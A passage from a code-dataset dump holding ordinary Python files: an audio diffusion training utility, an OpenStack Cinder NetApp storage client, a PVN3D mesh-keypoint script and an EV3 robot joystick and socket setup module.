0:length_target] #trow away the last samples\n elif (fs==48000).all():\n #approcimate resamppleint\n audio=torchaudio.functional.resample(audio, 160,147)\n return audio[:, 0:length_target]\n else:\n #if revious is unsuccesful bccause we have examples at 441000 and 48000 in the same batch,, just iterate over the batch\n proc_batch=torch.zeros((B,length_target), device=device)\n for i, (a, f_s) in enumerate(zip(audio, fs)): #I hope this shit wll not slow down everythingh\n if f_s==44100:\n #resample by 2\n pass\n elif f_s==48000:\n a=torchaudio.functional.resample(a, 160,147)\n else:\n print(\"WARNING, strange fs\", f_s)\n \n proc_batch[i]=a[0:length_target] \n return proc_batch\n else:\n print(\" resampling to fs_target\", fs_target)\n if (fs==44100).all():\n audio=torchaudio.functional.resample(audio, 44100, fs_target)\n return audio[:, 0:length_target] #trow away the last samples\n elif (fs==48000).all():\n #approcimate resamppleint\n audio=torchaudio.functional.resample(audio, 48000,fs_target)\n return audio[:, 0:length_target]\n else:\n #if revious is unsuccesful bccause we have examples at 441000 and 48000 in the same batch,, just iterate over the batch\n proc_batch=torch.zeros((B,length_target), device=device)\n for i, (a, f_s) in enumerate(zip(audio, fs)): #I hope this shit wll not slow down everythingh\n if f_s==44100:\n #resample by 2\n a=torchaudio.functional.resample(a, 44100,fs_target)\n elif f_s==48000:\n a=torchaudio.functional.resample(a, 48000,fs_target)\n else:\n print(\"WARNING, strange fs\", f_s)\n \n proc_batch[i]=a[0:length_target] \n return proc_batch\n\ndef load_state_dict( state_dict, network=None, ema=None, optimizer=None, log=True):\n '''\n utility for loading state dicts for different models. This function sequentially tries different strategies\n args:\n state_dict: the state dict to load\n returns:\n True if the state dict was loaded, False otherwise\n Assuming the operations are don in_place, this function will not create a copy of the network and optimizer (I hope)\n '''\n #print(state_dict)\n if log: print(\"Loading state dict\")\n if log:\n print(state_dict.keys())\n #if there\n try:\n if log: print(\"Attempt 1: trying with strict=True\")\n if network is not None:\n network.load_state_dict(state_dict['network'])\n if optimizer is not None:\n optimizer.load_state_dict(state_dict['optimizer'])\n if ema is not None:\n ema.load_state_dict(state_dict['ema'])\n return True\n except Exception as e:\n if log:\n print(\"Could not load state dict\")\n print(e)\n try:\n if log: print(\"Attempt 2: trying with strict=False\")\n if network is not None:\n network.load_state_dict(state_dict['network'], strict=False)\n #we cannot load the optimizer in this setting\n #self.optimizer.load_state_dict(state_dict['optimizer'], strict=False)\n if ema is not None:\n ema.load_state_dict(state_dict['ema'], strict=False)\n return True\n except Exception as e:\n if log:\n print(\"Could not load state dict\")\n print(e)\n print(\"training from scratch\")\n try:\n if log: print(\"Attempt 3: trying with strict=False,but making sure that the shapes are fine\")\n if ema is not None:\n ema_state_dict = ema.state_dict()\n if network is not None:\n network_state_dict = network.state_dict()\n i=0 \n if network is not None:\n for name, param in state_dict['network'].items():\n if log: print(\"checking\",name) \n if name in network_state_dict.keys():\n if network_state_dict[name].shape==param.shape:\n network_state_dict[name]=param\n if log:\n print(\"assigning\",name)\n i+=1\n network.load_state_dict(network_state_dict)\n if ema is not None:\n for name, param in state_dict['ema'].items():\n if log: print(\"checking\",name) \n if name in ema_state_dict.keys():\n if ema_state_dict[name].shape==param.shape:\n ema_state_dict[name]=param\n if log:\n print(\"assigning\",name)\n i+=1\n \n ema.load_state_dict(ema_state_dict)\n \n if i==0:\n if log: print(\"WARNING, no parameters were loaded\")\n raise Exception(\"No parameters were loaded\")\n elif i>0:\n if log: print(\"loaded\", i, \"parameters\")\n return True\n\n except Exception as e:\n print(e)\n print(\"the second strict=False failed\")\n\n\n try:\n if log: print(\"Attempt 4: Assuming the naming is different, with the network and ema called 'state_dict'\")\n if network is not None:\n network.load_state_dict(state_dict['state_dict'])\n if ema is not None:\n ema.load_state_dict(state_dict['state_dict'])\n except Exception as e:\n if log:\n print(\"Could not load state dict\")\n print(e)\n print(\"training from scratch\")\n print(\"It failed 3 times!! but not giving up\")\n #print the names of the parameters in self.network\n\n try:\n if log: print(\"Attempt 5: trying to load with different names, now model='model' and ema='ema_weights'\")\n if ema is not None:\n dic_ema = {}\n for (key, tensor) in zip(state_dict['model'].keys(), state_dict['ema_weights']):\n dic_ema[key] = tensor\n ema.load_state_dict(dic_ema)\n return True\n except Exception as e:\n if log:\n print(e)\n\n try:\n if log: print(\"Attempt 6: If there is something wrong with the name of the ema parameters, we can try to load them using the names of the parameters in the model\")\n if ema is not None:\n dic_ema = {}\n i=0\n for (key, tensor) in zip(state_dict['model'].keys(), state_dict['model'].values()):\n if tensor.requires_grad:\n dic_ema[key]=state_dict['ema_weights'][i]\n i=i+1\n else:\n dic_ema[key]=tensor \n ema.load_state_dict(dic_ema)\n return True\n except Exception as e:\n if log:\n print(e)\n\n #try:\n #assign the parameters in state_dict to self.network using a for loop\n print(\"Attempt 7: Trying to load the parameters one by one. This is for the dance diffusion model, looking for parameters starting with 'diffusion.' or 'diffusion_ema.'\")\n if ema is not None:\n ema_state_dict = ema.state_dict()\n if network is not None:\n network_state_dict = ema.state_dict()\n i=0 \n if network is not None:\n for name, param in state_dict['state_dict'].items():\n print(\"checking\",name) \n if name.startswith(\"diffusion.\"):\n i+=1\n name=name.replace(\"diffusion.\",\"\")\n if network_state_dict[name].shape==param.shape:\n #print(param.shape, network.state_dict()[name].shape)\n network_state_dict[name]=param\n #print(\"assigning\",name)\n\n network.load_state_dict(network_state_dict, strict=False)\n\n if ema is not None:\n for name, param in state_dict['state_dict'].items():\n if name.startswith(\"diffusion_ema.\"): \n i+=1\n name=name.replace(\"diffusion_ema.\",\"\")\n if ema_state_dict[name].shape==param.shape:\n if log:\n print(param.shape, ema.state_dict()[name].shape)\n ema_state_dict[name]=param\n\n ema.load_state_dict(ema_state_dict, strict=False)\n\n if i==0:\n print(\"WARNING, no parameters were loaded\")\n raise Exception(\"No parameters were loaded\")\n elif i>0:\n print(\"loaded\", i, \"parameters\")\n return True\n #except Exception as e:\n # if log:\n # print(e)\n\n return False\n\n \n","repo_name":"eloimoliner/audio-inpainting-diffusion","sub_path":"utils/training_utils.py","file_name":"training_utils.py","file_ext":"py","file_size_in_byte":16836,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"66"} +{"seq_id":"9583167105","text":"import sys\n\nfrom oslo_log import log as logging\nfrom oslo_utils import excutils\nimport six\n\nfrom cinder import exception\nfrom cinder.i18n import _\nfrom cinder import utils\nfrom cinder.volume.drivers.netapp.dataontap.client import api as netapp_api\nfrom cinder.volume.drivers.netapp import utils as na_utils\nfrom cinder.volume import volume_utils\n\nLOG = logging.getLogger(__name__)\n\nDELETED_PREFIX = 'deleted_cinder_'\nMAX_SIZE_FOR_A_LUN = '17555678822400'\n\n\n@six.add_metaclass(volume_utils.TraceWrapperMetaclass)\nclass Client(object):\n\n def __init__(self, **kwargs):\n host = kwargs['hostname']\n username = kwargs['username']\n password = kwargs['password']\n api_trace_pattern = kwargs['api_trace_pattern']\n self.connection = netapp_api.NaServer(\n host=host,\n transport_type=kwargs['transport_type'],\n port=kwargs['port'],\n username=username,\n password=password,\n api_trace_pattern=api_trace_pattern)\n\n self.ssh_client = self._init_ssh_client(host, username, password)\n\n def _init_ssh_client(self, host, username, password):\n return netapp_api.SSHUtil(\n host=host,\n username=username,\n password=password)\n\n def _init_features(self):\n \"\"\"Set up the repository of available Data ONTAP features.\"\"\"\n self.features = na_utils.Features()\n\n def get_ontap_version(self, cached=True):\n \"\"\"Gets the ONTAP version-string and version-tuple\"\"\"\n\n if cached:\n return self.connection.get_ontap_version()\n\n ontap_version = netapp_api.NaElement(\"system-get-version\")\n result = self.connection.invoke_successfully(\n ontap_version, enable_tunneling=True)\n\n version_tuple = result.get_child_by_name(\n 'version-tuple') or netapp_api.NaElement('none')\n ontap_version_tuple = version_tuple.get_child_by_name(\n 'system-version-tuple') or netapp_api.NaElement('none')\n\n version = (\n int(ontap_version_tuple.get_child_content('generation')),\n int(ontap_version_tuple.get_child_content('major')),\n int(ontap_version_tuple.get_child_content('minor')))\n\n return version\n\n def get_ontapi_version(self, cached=True):\n \"\"\"Gets the supported ontapi version.\"\"\"\n\n if cached:\n return self.connection.get_api_version()\n\n ontapi_version = netapp_api.NaElement('system-get-ontapi-version')\n res = self.connection.invoke_successfully(ontapi_version, False)\n major = res.get_child_content('major-version')\n minor = res.get_child_content('minor-version')\n return major, minor\n\n def _strip_xml_namespace(self, string):\n if string.startswith('{') and '}' in string:\n return string.split('}', 1)[1]\n return string\n\n def check_is_naelement(self, elem):\n \"\"\"Checks if object is instance of NaElement.\"\"\"\n if not isinstance(elem, netapp_api.NaElement):\n raise ValueError('Expects NaElement')\n\n def create_lun(self, volume_name, lun_name, size, metadata,\n qos_policy_group_name=None,\n qos_policy_group_is_adaptive=False):\n \"\"\"Issues API request for creating LUN on volume.\"\"\"\n self._validate_qos_policy_group(qos_policy_group_is_adaptive)\n\n path = '/vol/%s/%s' % (volume_name, lun_name)\n space_reservation = metadata['SpaceReserved']\n initial_size = size\n ontap_version = self.get_ontap_version()\n\n # On older ONTAP versions the extend size is limited to its\n # geometry on max_resize_size. In order to remove this\n # limitation we create the LUN with its maximum possible size\n # and then shrink to the requested size.\n if ontap_version < (9, 5, 0):\n initial_size = MAX_SIZE_FOR_A_LUN\n # In order to create a LUN with its maximum size (16TB),\n # the space_reservation needs to be disabled\n space_reservation = 'false'\n\n params = {'path': path, 'size': str(initial_size),\n 'ostype': metadata['OsType'],\n 'space-reservation-enabled': space_reservation}\n version = self.get_ontapi_version()\n if version >= (1, 110):\n params['use-exact-size'] = 'true'\n lun_create = netapp_api.NaElement.create_node_with_children(\n 'lun-create-by-size',\n **params)\n if qos_policy_group_name:\n if qos_policy_group_is_adaptive:\n lun_create.add_new_child(\n 'qos-adaptive-policy-group', qos_policy_group_name)\n else:\n lun_create.add_new_child(\n 'qos-policy-group', qos_policy_group_name)\n\n try:\n self.connection.invoke_successfully(lun_create, True)\n except netapp_api.NaApiError as ex:\n with excutils.save_and_reraise_exception():\n LOG.error(\"Error provisioning volume %(lun_name)s on \"\n \"%(volume_name)s. Details: %(ex)s\",\n {'lun_name': lun_name,\n 'volume_name': volume_name,\n 'ex': ex})\n\n if ontap_version < (9, 5, 0):\n self.do_direct_resize(path, six.text_type(size))\n if metadata['SpaceReserved'] == 'true':\n self.set_lun_space_reservation(path, True)\n\n def set_lun_space_reservation(self, path, flag):\n \"\"\"Sets the LUN space reservation on ONTAP.\"\"\"\n\n lun_modify_space_reservation = (\n netapp_api.NaElement.create_node_with_children(\n 'lun-set-space-reservation-info', **{\n 'path': path,\n 'enable': str(flag)}))\n self.connection.invoke_successfully(lun_modify_space_reservation, True)\n\n def destroy_lun(self, path, force=True):\n \"\"\"Destroys the LUN at the path.\"\"\"\n lun_destroy = netapp_api.NaElement.create_node_with_children(\n 'lun-destroy',\n **{'path': path})\n if force:\n lun_destroy.add_new_child('force', 'true')\n self.connection.invoke_successfully(lun_destroy, True)\n seg = path.split(\"/\")\n LOG.debug(\"Destroyed LUN %s\", seg[-1])\n\n def map_lun(self, path, igroup_name, lun_id=None):\n \"\"\"Maps LUN to the initiator and returns LUN id assigned.\"\"\"\n lun_map = netapp_api.NaElement.create_node_with_children(\n 'lun-map', **{'path': path,\n 'initiator-group': igroup_name})\n if lun_id:\n lun_map.add_new_child('lun-id', lun_id)\n try:\n result = self.connection.invoke_successfully(lun_map, True)\n return result.get_child_content('lun-id-assigned')\n except netapp_api.NaApiError as e:\n code = e.code\n message = e.message\n LOG.warning('Error mapping LUN. Code :%(code)s, Message: '\n '%(message)s', {'code': code, 'message': message})\n raise\n\n def unmap_lun(self, path, igroup_name):\n \"\"\"Unmaps a LUN from given initiator.\"\"\"\n lun_unmap = netapp_api.NaElement.create_node_with_children(\n 'lun-unmap',\n **{'path': path, 'initiator-group': igroup_name})\n try:\n self.connection.invoke_successfully(lun_unmap, True)\n except netapp_api.NaApiError as e:\n exc_info = sys.exc_info()\n LOG.warning(\"Error unmapping LUN. Code :%(code)s, Message: \"\n \"%(message)s\", {'code': e.code,\n 'message': e.message})\n # if the LUN is already unmapped\n if e.code == '13115' or e.code == '9016':\n pass\n else:\n six.reraise(*exc_info)\n\n def create_igroup(self, igroup, igroup_type='iscsi', os_type='default'):\n \"\"\"Creates igroup with specified args.\"\"\"\n igroup_create = netapp_api.NaElement.create_node_with_children(\n 'igroup-create',\n **{'initiator-group-name': igroup,\n 'initiator-group-type': igroup_type,\n 'os-type': os_type})\n self.connection.invoke_successfully(igroup_create, True)\n\n def add_igroup_initiator(self, igroup, initiator):\n \"\"\"Adds initiators to the specified igroup.\"\"\"\n igroup_add = netapp_api.NaElement.create_node_with_children(\n 'igroup-add',\n **{'initiator-group-name': igroup,\n 'initiator': initiator})\n self.connection.invoke_successfully(igroup_add, True)\n\n def do_direct_resize(self, path, new_size_bytes, force=True):\n \"\"\"Resize the LUN.\"\"\"\n seg = path.split(\"/\")\n LOG.info(\"Resizing LUN %s directly to new size.\", seg[-1])\n lun_resize = netapp_api.NaElement.create_node_with_children(\n 'lun-resize',\n **{'path': path,\n 'size': new_size_bytes})\n if force:\n lun_resize.add_new_child('force', 'true')\n self.connection.invoke_successfully(lun_resize, True)\n\n def get_lun_geometry(self, path):\n \"\"\"Gets the LUN geometry.\"\"\"\n geometry = {}\n lun_geo = netapp_api.NaElement(\"lun-get-geometry\")\n lun_geo.add_new_child('path', path)\n try:\n result = self.connection.invoke_successfully(lun_geo, True)\n geometry['size'] = result.get_child_content(\"size\")\n geometry['bytes_per_sector'] = result.get_child_content(\n \"bytes-per-sector\")\n geometry['sectors_per_track'] = result.get_child_content(\n \"sectors-per-track\")\n geometry['tracks_per_cylinder'] = result.get_child_content(\n \"tracks-per-cylinder\")\n geometry['cylinders'] = result.get_child_content(\"cylinders\")\n geometry['max_resize'] = result.get_child_content(\n \"max-resize-size\")\n except Exception as e:\n LOG.error(\"LUN %(path)s geometry failed. Message - %(msg)s\",\n {'path': path, 'msg': six.text_type(e)})\n return geometry\n\n def get_volume_options(self, volume_name):\n \"\"\"Get the value for the volume option.\"\"\"\n opts = []\n vol_option_list = netapp_api.NaElement(\"volume-options-list-info\")\n vol_option_list.add_new_child('volume', volume_name)\n result = self.connection.invoke_successfully(vol_option_list, True)\n options = result.get_child_by_name(\"options\")\n if options:\n opts = options.get_children()\n return opts\n\n def move_lun(self, path, new_path):\n \"\"\"Moves the LUN at path to new path.\"\"\"\n seg = path.split(\"/\")\n new_seg = new_path.split(\"/\")\n LOG.debug(\"Moving LUN %(name)s to %(new_name)s.\",\n {'name': seg[-1], 'new_name': new_seg[-1]})\n lun_move = netapp_api.NaElement(\"lun-move\")\n lun_move.add_new_child(\"path\", path)\n lun_move.add_new_child(\"new-path\", new_path)\n self.connection.invoke_successfully(lun_move, True)\n\n def get_iscsi_target_details(self):\n \"\"\"Gets the iSCSI target portal details.\"\"\"\n raise NotImplementedError()\n\n def get_fc_target_wwpns(self):\n \"\"\"Gets the FC target details.\"\"\"\n raise NotImplementedError()\n\n def get_iscsi_service_details(self):\n \"\"\"Returns iscsi iqn.\"\"\"\n raise NotImplementedError()\n\n def check_iscsi_initiator_exists(self, iqn):\n \"\"\"Returns True if initiator exists.\"\"\"\n raise NotImplementedError()\n\n def set_iscsi_chap_authentication(self, iqn, username, password):\n \"\"\"Provides NetApp host's CHAP credentials to the backend.\"\"\"\n raise NotImplementedError()\n\n def get_lun_list(self):\n \"\"\"Gets the list of LUNs on filer.\"\"\"\n raise NotImplementedError()\n\n def get_igroup_by_initiators(self, initiator_list):\n \"\"\"Get igroups exactly matching a set of initiators.\"\"\"\n raise NotImplementedError()\n\n def _validate_qos_policy_group(self, is_adaptive, spec=None, is_nfs=False):\n \"\"\"Raises an exception if the backend doesn't support the QoS spec.\"\"\"\n raise NotImplementedError()\n\n def _has_luns_mapped_to_initiator(self, initiator):\n \"\"\"Checks whether any LUNs are mapped to the given initiator.\"\"\"\n lun_list_api = netapp_api.NaElement('lun-initiator-list-map-info')\n lun_list_api.add_new_child('initiator', initiator)\n result = self.connection.invoke_successfully(lun_list_api, True)\n lun_maps_container = result.get_child_by_name(\n 'lun-maps') or netapp_api.NaElement('none')\n return len(lun_maps_container.get_children()) > 0\n\n def has_luns_mapped_to_initiators(self, initiator_list):\n \"\"\"Checks whether any LUNs are mapped to the given initiator(s).\"\"\"\n for initiator in initiator_list:\n if self._has_luns_mapped_to_initiator(initiator):\n return True\n return False\n\n def get_lun_by_args(self, **args):\n \"\"\"Retrieves LUNs with specified args.\"\"\"\n raise NotImplementedError()\n\n def get_performance_counter_info(self, object_name, counter_name):\n \"\"\"Gets info about one or more Data ONTAP performance counters.\"\"\"\n\n api_args = {'objectname': object_name}\n result = self.connection.send_request('perf-object-counter-list-info',\n api_args,\n enable_tunneling=False)\n\n counters = result.get_child_by_name(\n 'counters') or netapp_api.NaElement('None')\n\n for counter in counters.get_children():\n\n if counter.get_child_content('name') == counter_name:\n\n labels = []\n label_list = counter.get_child_by_name(\n 'labels') or netapp_api.NaElement('None')\n for label in label_list.get_children():\n labels.extend(label.get_content().split(','))\n base_counter = counter.get_child_content('base-counter')\n\n return {\n 'name': counter_name,\n 'labels': labels,\n 'base-counter': base_counter,\n }\n else:\n raise exception.NotFound(_('Counter %s not found') % counter_name)\n\n def delete_snapshot(self, volume_name, snapshot_name):\n \"\"\"Deletes a volume snapshot.\"\"\"\n api_args = {'volume': volume_name, 'snapshot': snapshot_name}\n self.connection.send_request('snapshot-delete', api_args)\n\n def create_cg_snapshot(self, volume_names, snapshot_name):\n \"\"\"Creates a consistency group snapshot out of one or more flexvols.\n\n ONTAP requires an invocation of cg-start to first fence off the\n flexvols to be included in the snapshot. If cg-start returns\n success, a cg-commit must be executed to finalized the snapshot and\n unfence the flexvols.\n \"\"\"\n cg_id = self._start_cg_snapshot(volume_names, snapshot_name)\n if not cg_id:\n msg = _('Could not start consistency group snapshot %s.')\n raise exception.VolumeBackendAPIException(data=msg % snapshot_name)\n self._commit_cg_snapshot(cg_id)\n\n def _start_cg_snapshot(self, volume_names, snapshot_name):\n snapshot_init = {\n 'snapshot': snapshot_name,\n 'timeout': 'relaxed',\n 'volumes': [\n {'volume-name': volume_name} for volume_name in volume_names\n ],\n }\n result = self.connection.send_request('cg-start', snapshot_init)\n return result.get_child_content('cg-id')\n\n def _commit_cg_snapshot(self, cg_id):\n snapshot_commit = {'cg-id': cg_id}\n self.connection.send_request('cg-commit', snapshot_commit)\n\n def get_snapshot(self, volume_name, snapshot_name):\n \"\"\"Gets a single snapshot.\"\"\"\n raise NotImplementedError()\n\n @utils.retry(exception.SnapshotIsBusy)\n def wait_for_busy_snapshot(self, flexvol, snapshot_name):\n \"\"\"Checks for and handles a busy snapshot.\n\n If a snapshot is busy, for reasons other than cloning, an exception is\n raised immediately. Otherwise, wait for a period of time for the clone\n dependency to finish before giving up. If the snapshot is not busy then\n no action is taken and the method exits.\n \"\"\"\n snapshot = self.get_snapshot(flexvol, snapshot_name)\n if not snapshot['busy']:\n LOG.debug(\"Backing consistency group snapshot %s available for \"\n \"deletion.\", snapshot_name)\n return\n else:\n LOG.debug(\"Snapshot %(snap)s for vol %(vol)s is busy, waiting \"\n \"for volume clone dependency to clear.\",\n {\"snap\": snapshot_name, \"vol\": flexvol})\n raise exception.SnapshotIsBusy(snapshot_name=snapshot_name)\n\n def mark_snapshot_for_deletion(self, volume, snapshot_name):\n \"\"\"Mark snapshot for deletion by renaming snapshot.\"\"\"\n return self.rename_snapshot(\n volume, snapshot_name, DELETED_PREFIX + snapshot_name)\n\n def rename_snapshot(self, volume, current_name, new_name):\n \"\"\"Renames a snapshot.\"\"\"\n api_args = {\n 'volume': volume,\n 'current-name': current_name,\n 'new-name': new_name,\n }\n return self.connection.send_request('snapshot-rename', api_args)\n","repo_name":"openstack/cinder","sub_path":"cinder/volume/drivers/netapp/dataontap/client/client_base.py","file_name":"client_base.py","file_ext":"py","file_size_in_byte":17544,"program_lang":"python","lang":"en","doc_type":"code","stars":628,"dataset":"github-code","pt":"66"} +{"seq_id":"36099626834","text":"#!/usr/bin/env python3\nimport os\nimport numpy as np\nimport glob\nfrom plyfile import PlyData\nfrom tqdm import tqdm\nimport pickle as pkl\nfrom fps.fps_utils import farthest_point_sampling\nfrom argparse import ArgumentParser\n\n\nparser = ArgumentParser()\nparser.add_argument(\"ply_pth\", type=str, help=\"path to the input ply mesh model.\")\nparser.add_argument(\"sv_fd\", type=str, help=\"path to save the generated mesh info.\")\nparser.print_help()\nargs = parser.parse_args()\n\n\n# Read object vertexes from ply file\ndef get_p3ds_from_ply(ply_pth):\n print(\"loading p3ds from ply:\", ply_pth)\n ply = PlyData.read(ply_pth)\n data = ply.elements[0].data\n x = data['x']\n y = data['y']\n z = data['z']\n p3ds = np.stack([x, y, z], axis=-1)\n print(\"finish loading ply.\")\n return p3ds\n\n\n# Read object vertexes from text file\ndef get_p3ds_from_txt(pxyz_pth):\n pointxyz = np.loadtxt(pxyz_pth, dtype=np.float32)\n return pointxyz\n\n\n# Compute the 3D bounding box from object vertexes\ndef get_corners_3d(p3ds, small=False):\n x = p3ds[:, 0]\n min_x, max_x = np.min(x), np.max(x)\n y = p3ds[:, 1]\n min_y, max_y = np.min(y), np.max(y)\n z = p3ds[:, 2]\n min_z, max_z = np.min(z), np.max(z)\n corners_3d = np.array([\n [min_x, min_y, min_z],\n [min_x, min_y, max_z],\n [min_x, max_y, min_z],\n [min_x, max_y, max_z],\n [max_x, min_y, min_z],\n [max_x, min_y, max_z],\n [max_x, max_y, min_z],\n [max_x, max_y, max_z],\n ])\n if small:\n center = np.mean(corners_3d, 0)\n corners_3d = (corners_3d - center[None,:]) * 2.0 / 3.0 + center[None,:]\n return corners_3d\n\n\n# Compute the radius of object\ndef get_radius(corners_3d):\n radius = np.linalg.norm(np.max(corners_3d, 0)-np.min(corners_3d, 0)) / 2.0\n return radius\n\n\n# Compute the center of object\ndef get_centers_3d(corners_3d):\n centers_3d=(np.max(corners_3d, 0) + np.min(corners_3d, 0)) / 2\n return centers_3d\n\n\n# Select keypoint with Farthest Point Sampling (FPS) algorithm\ndef get_farthest_3d(p3ds, num=8, init_center=False):\n fps = farthest_point_sampling(p3ds, num, init_center=init_center)\n return fps\n\n\n# Compute and save all mesh info\ndef gen_one_mesh_info(ply_pth, sv_fd):\n if not os.path.exists(sv_fd):\n os.system(\"mkdir -p %s\" % sv_fd)\n p3ds = get_p3ds_from_ply(ply_pth)\n\n c3ds = get_corners_3d(p3ds)\n c3ds_pth = os.path.join(sv_fd, \"corners.txt\")\n with open(c3ds_pth, 'w') as of:\n for p3d in c3ds:\n print(p3d[0], p3d[1], p3d[2], file=of)\n\n radius = get_radius(c3ds)\n r_pth = os.path.join(sv_fd, \"radius.txt\")\n with open(r_pth, 'w') as of:\n print(radius, file=of)\n\n ctr = get_centers_3d(c3ds)\n ctr_pth = os.path.join(sv_fd, \"center.txt\")\n with open(ctr_pth, 'w') as of:\n print(ctr[0], ctr[1], ctr[2], file=of)\n\n fps = get_farthest_3d(p3ds, num=8)\n fps_pth = os.path.join(sv_fd, \"farthest.txt\")\n with open(fps_pth, 'w') as of:\n for p3d in fps:\n print(p3d[0], p3d[1], p3d[2], file=of)\n\n\ndef test():\n ply_pth = '../../../datasets/ycb/YCB_Video_Dataset/models/002_master_chef_can/textured.ply'\n gen_one_mesh_info(ply_pth, 'mesh_info/002_master_chef_can')\n\n\ndef main():\n # test()\n gen_one_mesh_info(args.ply_pth, args.sv_fd)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n# vim: ts=4 sw=4 sts=4 expandtab\n","repo_name":"ethnhe/PVN3D","sub_path":"pvn3d/lib/utils/dataset_tools/gen_obj_info.py","file_name":"gen_obj_info.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":451,"dataset":"github-code","pt":"66"} +{"seq_id":"13681901205","text":"#!/usr/bin/env pybricks-micropython\n# coding=utf-8\n\nimport sys\nimport socket\nimport struct\nimport uselect\nimport _thread\nimport moduler.config as config\nfrom pybricks.hubs import EV3Brick\nfrom moduler.funksjoner import Bunch\n\n# Set up socket for joystick inputs\ndef InputSocket(robot,Configs):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n robot.inputSock = sock\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind((\"\", 8080))\n sock.listen(1)\n\n if not Configs.livePlot:\n print(\"Waiting for joystick connection from computer (Run the file called 'Run_2_PC.py')\")\n robot.brick.speaker.beep()\n\n # Motta koblingen og send tilbake \"acknowledgment\" som byte\n connection, _ = sock.accept()\n connection.setblocking(False)\n connection.send(b\"ack\")\n\n if not Configs.livePlot:\n print(\"Acknowlegment sent to joystick on computer.\")\n robot.JoystickConnection = connection\n\n\ndef Initialize(Configs):\n \n # inneholder all info om roboten\n robot = Bunch()\n robot.brick = EV3Brick()\n\n # joystick inneholder all info om joysticken.\n robot.joystick = infoJoystick()\n\n if Configs.ConnectJoystickToPC and robot.joystick[\"id\"] != None:\n print('____ FEIL VED KOBLING AV STYRESTIKK ____')\n print(\"To use a joystick on robot, you must specify Configs.ConnectJoystickToPC=False\")\n print(\"To use a joystick on PC/Mac, you must specify Configs.ConnectJoystickToPC=True\")\n print(\"You have specified Configs.ConnectJoystickToPC=True, but the joystick is connected to the robot.\")\n print('________________________________________')\n print()\n raise Exception()\n\n\n if Configs.ConnectJoystickToPC:\n print('__ PLEASE CONNECT JOYSTICK TO PC/MAC! __')\n print('Configs.ConnectJoystickToPC = True')\n print(\"You have chosen to connect the joystick to the PC/Mac.\")\n print(\"______________________________________________________\")\n print()\n\n \n if Configs.ConnectJoystickToPC:\n _thread.start_new_thread(InputSocket, (robot,Configs)) \n\n if Configs.livePlot:\n # Sett opp socketobjektet, og hør etter for \"connection\"\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n robot.sock = sock\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind((\"\", 8070))\n sock.listen(1)\n\n # Gi et pip fra robotten samt print i terminal\n # for å vise at den er klar for socketkobling fra PC\n print(\"Waiting for connection from computer.\")\n robot.brick.speaker.beep()\n\n # Motta koblingen og send tilbake \"acknowledgment\" som byte\n connection, _ = sock.accept()\n connection.send(b\"ack\")\n print(\"Acknowlegment sent to computer.\")\n robot.connection = connection\n\n if Configs.ConnectJoystickToPC:\n while not \"JoystickConnection\" in robot.__dict__:\n pass\n print('Ready to read joystick inputs from PC/Mac')\n\n \n # Fila hvor alle dataene dine lagres\n robot.dataToFile = open(Configs.filename, \"w\")\n return robot\n\n\n\ndef identifyJoystick():\n \"\"\"\n Identifiserer hvilken styrestikk som er koblet til;\n enten logitech eller dacota (eventuelt en annen styrestikk)\n Denne funksjonen skal ikke endres.\n \"\"\"\n\n for i in range(2, 1000):\n path = (\"/dev/bus/usb/001/{:03d}\".format(i))\n try:\n with open(path, \"rb\") as f:\n joy = f.read()\n if joy[2] == 16:\n return \"logitech\"\n elif joy[2] == 0:\n return \"dacota\"\n else:\n return \"Ukjent styrestikk.\"\n except:\n # print(\"Feil i identifyJoystick!\")\n pass\n\n\n\ndef infoJoystick():\n \"\"\"\n Fyller ut og returnerer en \"joystick\"-dictionary som inneholder all info om styrestikk.\n Nøkler i dictionaryen er som følger:\n \"id\" - retur fra identifyJoystick()\n \"scale\" - skaleringsverdi, avhengig av hvilken styrestikk som brukes\n \"FORMAT\" - long int x2, unsigned short x2, unsigned int\n \"EVENT_SIZE\" - struct.calcsize av \"FORMAT\"\n \"in_file\" - hvor bevegelsene til styrestikken lagres på EV3en\n \"\"\"\n\n joystick = {}\n joystick[\"id\"] = identifyJoystick()\n \n joyScale = 0\n if joystick[\"id\"] == \"logitech\":\n joyScale = 1024\n\n elif joystick[\"id\"] == \"dacota\":\n joyScale = 255\n\n\n joystick[\"scale\"] = joyScale\n joystick[\"FORMAT\"] = 'llHHI'\n joystick[\"EVENT_SIZE\"] = struct.calcsize(joystick[\"FORMAT\"])\n try:\n joystick[\"in_file\"] = open(\"/dev/input/event2\", \"rb\")\n except OSError: # hvis ingen joystick er koblet til\n joystick[\"in_file\"] = None\n return joystick\n\ndef getJoystickValues(robot):\n print(\"Joystick thread started\")\n\n event_poll = uselect.poll()\n if robot.joystick[\"in_file\"] is not None:\n event_poll.register(robot.joystick[\"in_file\"], uselect.POLLIN)\n else:\n return\n while True:\n events = event_poll.poll(0)\n if len(events) > 0 and events[0][1] & uselect.POLLIN:\n try:\n (_, _, ev_type, code, value) = struct.unpack(\n robot.joystick[\"FORMAT\"],\n robot.joystick[\"in_file\"].read(\n robot.joystick[\"EVENT_SIZE\"]))\n except Exception as e:\n sys.print_exception(e)\n if ev_type == 1:\n\n # Når man slipper knappene så skal \n # state falle tilbake på 0. Konverterer også False/True til tall-verdier\n # som skrives til fil og kan dermed konverteres i matlab.\n if value == 0:\n state = 0\n else:\n state = 1\n #_______________________________________\n \n if code == 288:\n config.joy1Instance = state\n config.joyMainSwitch = state\n elif code == 289:\n config.joy2Instance = state\n elif code == 290:\n config.joy3Instance = state\n elif code == 291:\n config.joy4Instance = state\n elif code == 292:\n config.joy5Instance = state\n elif code == 293:\n config.joy6Instance = state\n elif code == 294:\n config.joy7Instance = state\n elif code == 295:\n config.joy8Instance = state \n elif code == 296:\n config.joy9Instance = state\n elif code == 297:\n config.joy10Instance = state\n elif code == 298:\n config.joy11Instance = state\n elif code == 299:\n config.joy12Instance = state\n else:\n # indikasjon på at jeg har glemt å ta med en knapp; legg til i koden\n print(\"--------------------------------------\")\n print(\"Unknown code!\")\n print(\"ev_type: \" + str(ev_type) + \". code: \" + str(code) + \". value: \" + str(value) + \".\")\n 